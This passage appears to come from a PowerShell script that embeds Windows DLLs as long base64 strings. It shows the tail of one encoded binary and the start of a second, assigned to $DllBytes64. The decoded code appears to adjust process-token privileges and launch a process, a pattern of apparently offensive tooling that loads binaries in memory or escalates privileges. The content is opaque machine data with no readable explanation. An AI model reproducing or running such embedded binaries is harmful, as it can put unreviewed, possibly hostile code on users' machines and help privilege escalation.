JJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50APMBR2V0RmlsZVR5cGUAYwJHZXRTdGFydHVwSW5mb1cA0QBEZWxldGVDcml0aWNhbFNlY3Rpb24AEwJHZXRNb2R1bGVGaWxlTmFtZUEAAGEBRnJlZUVudmlyb25tZW50U3RyaW5nc1cAEQVXaWRlQ2hhclRvTXVsdGlCeXRlANoBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAzQJIZWFwQ3JlYXRlAADOAkhlYXBEZXN0cm95AKcDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAkwJHZXRUaWNrQ291bnQAAMEBR2V0Q3VycmVudFByb2Nlc3NJZAB5AkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAMsCSGVhcEFsbG9jALEDUmFpc2VFeGNlcHRpb24AADkDTGVhdmVDcml0aWNhbFNlY3Rpb24AAO4ARW50ZXJDcml0aWNhbFNlY3Rpb24AAHIBR2V0Q1BJbmZvAGgBR2V0QUNQAAA3AkdldE9FTUNQAAAKA0lzVmFsaWRDb2RlUGFnZQDSAkhlYXBSZUFsbG9jAD8DTG9hZExpYnJhcnlXAAAlBVdyaXRlRmlsZQAUAkdldE1vZHVsZUZpbGVOYW1lVwAAGARSdGxVbndpbmQA1AJIZWFwU2l6ZQAALQNMQ01hcFN0cmluZ1cAAGcDTXVsdGlCeXRlVG9XaWRlQ2hhcgBpAkdldFN0cmluZ1R5cGVXAAAEA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==" $DllBytes64 = "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